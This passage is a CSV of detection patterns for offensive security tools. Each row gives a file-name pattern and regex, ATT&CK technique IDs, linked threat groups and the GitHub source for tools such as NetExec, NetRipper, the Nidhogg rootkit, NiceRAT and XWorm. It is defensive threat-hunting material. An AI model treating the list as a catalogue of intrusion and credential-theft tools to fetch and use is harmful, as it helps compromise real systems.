fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16780" "*\net_4.7_32_RunasCs.exe*",".{0,1000}\\net_4\.7_32_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16781" "*\net_4.7_64_RunasCs.exe*",".{0,1000}\\net_4\.7_64_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16782" "*\net_4.7_Any_RunasCs.exe*",".{0,1000}\\net_4\.7_Any_RunasCs\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","16783" "*\net_portscan.py*",".{0,1000}\\net_portscan\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","N/A","10","10","955","147","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z","16784" "*\NETAMSI.ps1*",".{0,1000}\\NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely 
written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16786" "*\NETAMSI.ps1*",".{0,1000}\\NETAMSI\.ps1.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","16787" "*\NetClone.exe*",".{0,1000}\\NetClone\.exe.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","16789" "*\NetClone\Program.cs*",".{0,1000}\\NetClone\\Program\.cs.{0,1000}","offensive_tool_keyword","Koppeling","Adaptive DLL hijacking / dynamic export forwarding","T1574.002","TA0005","N/A","N/A","Defense Evasion","https://github.com/monoxgas/Koppeling","1","0","N/A","N/A","8","8","748","128","2020-07-06T14:47:57Z","2020-02-18T21:08:16Z","16790" "*\netcreds.py*",".{0,1000}\\netcreds\.py.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - 
T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","16791" "*\netexec.py*",".{0,1000}\\netexec\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16792" "*\netexec.yml*",".{0,1000}\\netexec\.yml.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16793" "*\NetExec-main\*",".{0,1000}\\NetExec\-main\\.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","16794" "*\Net-GPPPassword.exe*",".{0,1000}\\Net\-GPPPassword\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - 
T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","16795" "*\netkit\client\shell.py*",".{0,1000}\\netkit\\client\\shell\.py.{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","16796" "*\netkit\src\netkit.*",".{0,1000}\\netkit\\src\\netkit\..{0,1000}","offensive_tool_keyword","netkit","Netkit is a purposefully small rootkit which can be used by clients over network to maintain a sneaky foothold into a device.","T1547 - T1021 - T1071 - T1562.001 - T1055 - T1041 - T1105","TA0003 - TA0005 - TA0002 - TA0007 - TA0009 - TA0040","N/A","N/A","Defense Evasion","https://github.com/Notselwyn/netkit","1","0","N/A","N/A","10","1","30","7","2024-03-27T19:07:03Z","2023-07-19T00:00:45Z","16797" "*\NetLoader.exe*",".{0,1000}\\NetLoader\.exe.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","N/A","10","9","820","147","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z","16798" "*\NetRipper.cpp*",".{0,1000}\\NetRipper\.cpp.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration 
testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16799" "*\NetRipper.dll*",".{0,1000}\\NetRipper\.dll.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16800" "*\NetRipper.exe*",".{0,1000}\\NetRipper\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16801" "*\netripper.rb*",".{0,1000}\\netripper\.rb.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16802" "*\NetRipper.sln*",".{0,1000}\\NetRipper\.sln.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16803" "*\NetRipper.x64.exe*",".{0,1000}\\NetRipper\.x64\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - 
TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16804" "*\NetRipper.x64.pdb*",".{0,1000}\\NetRipper\.x64\.pdb.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16805" "*\NetRipper.x86.exe*",".{0,1000}\\NetRipper\.x86\.exe.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16806" "*\NetRipper.x86.pdb*",".{0,1000}\\NetRipper\.x86\.pdb.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16807" "*\NetRipperLog.txt*",".{0,1000}\\NetRipperLog\.txt.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","16808" "*\NetSess.exe*",".{0,1000}\\NetSess\.exe.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. 
","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","16820" "*\NetSess.zip*",".{0,1000}\\NetSess\.zip.{0,1000}","offensive_tool_keyword","NetSess","Command line tool to enumerate NetBIOS sessions on a specified local or remote machine. ","T1016 - T1046 - T1087","TA0007 - TA0043","N/A","MUSTANG PANDA","Discovery","https://www.joeware.net/freetools/tools/netsess/","1","0","N/A","N/A","7","9","N/A","N/A","N/A","N/A","16821" "*\NetshHelperBeacon.cpp*",".{0,1000}\\NetshHelperBeacon\.cpp.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16823" "*\NetshHelperBeacon.dll*",".{0,1000}\\NetshHelperBeacon\.dll.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16824" "*\NetshHelperBeacon.lib*",".{0,1000}\\NetshHelperBeacon\.lib.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16825" "*\NetshHelperBeacon.log*",".{0,1000}\\NetshHelperBeacon\.log.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. 
Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16826" "*\NetshHelperBeacon.pdb*",".{0,1000}\\NetshHelperBeacon\.pdb.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16827" "*\NetshHelperBeacon\*",".{0,1000}\\NetshHelperBeacon\\.{0,1000}","offensive_tool_keyword","NetshHelperBeacon","DLL to load from Windows NetShell. Will pop calc and execute shellcode.","T1055 - T1218","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/outflanknl/NetshHelperBeacon","1","0","N/A","N/A","10","2","179","36","2016-09-26T19:57:08Z","2016-09-26T12:52:02Z","16828" "*\netshlep.cpp*",".{0,1000}\\netshlep\.cpp.{0,1000}","offensive_tool_keyword","Offensive-Netsh-Helper","Maintain Windows Persistence with an evil Netshell Helper DLL","T1174 - T1055.011 - T1546.013 - T1574.002 - T1105","TA0003 ","N/A","N/A","Persistence","https://github.com/rtcrowley/Offensive-Netsh-Helper","1","0","N/A","N/A","9","1","12","5","2018-07-28T02:12:09Z","2018-07-25T22:49:20Z","16829" "*\netview.py*",".{0,1000}\\netview\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","16837" "*\netview.x64.dll*",".{0,1000}\\netview\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","16838" "*\netwalker.txt*",".{0,1000}\\netwalker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","16839" "*\NetworkFileManagerPHP.php*",".{0,1000}\\NetworkFileManagerPHP\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","16840" 
"*\NetworkServiceExploit.pdb*",".{0,1000}\\NetworkServiceExploit\.pdb.{0,1000}","offensive_tool_keyword","NetworkServiceExploit","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16841" "*\NetworkServiceExploit.pdb*",".{0,1000}\\NetworkServiceExploit\.pdb.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","NetworkServiceExploit","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","16842" "*\NewPhish.ps1*",".{0,1000}\\NewPhish\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","0","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","16843" "*\nGenerated payload:*",".{0,1000}\\nGenerated\spayload\:.{0,1000}","offensive_tool_keyword","Rev-Shell","Basic script to generate reverse shell payloads","T1055.011 - T1021.005 - T1560.001","TA0002 - TA0005 - TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/washingtonP1974/Rev-Shell","1","0","N/A","N/A","3","10","29","1","2024-03-20T13:58:21Z","2024-03-20T13:37:12Z","16844" "*\Ngrok-Disk.dll*",".{0,1000}\\Ngrok\-Disk\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16851" "*\Ngrok-Install.dll*",".{0,1000}\\Ngrok\-Install\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","N/A","10","","N/A","","","","16852" "*\NiceFile.ppam*",".{0,1000}\\NiceFile\.ppam.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","16853" "*\NiceRAT.py*",".{0,1000}\\NiceRAT\.py.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","16854" 
"*\NiceRAT-1.0.0.zip*",".{0,1000}\\NiceRAT\-1\.0\.0\.zip.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","16855" "*\NiceRAT-main\*",".{0,1000}\\NiceRAT\-main\\.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","16856" "*\Nidhogg.cpp*",".{0,1000}\\Nidhogg\.cpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16857" "*\Nidhogg.exe*",".{0,1000}\\Nidhogg\.exe.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an 
all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16858" "*\Nidhogg.sln*",".{0,1000}\\Nidhogg\.sln.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","16859" 
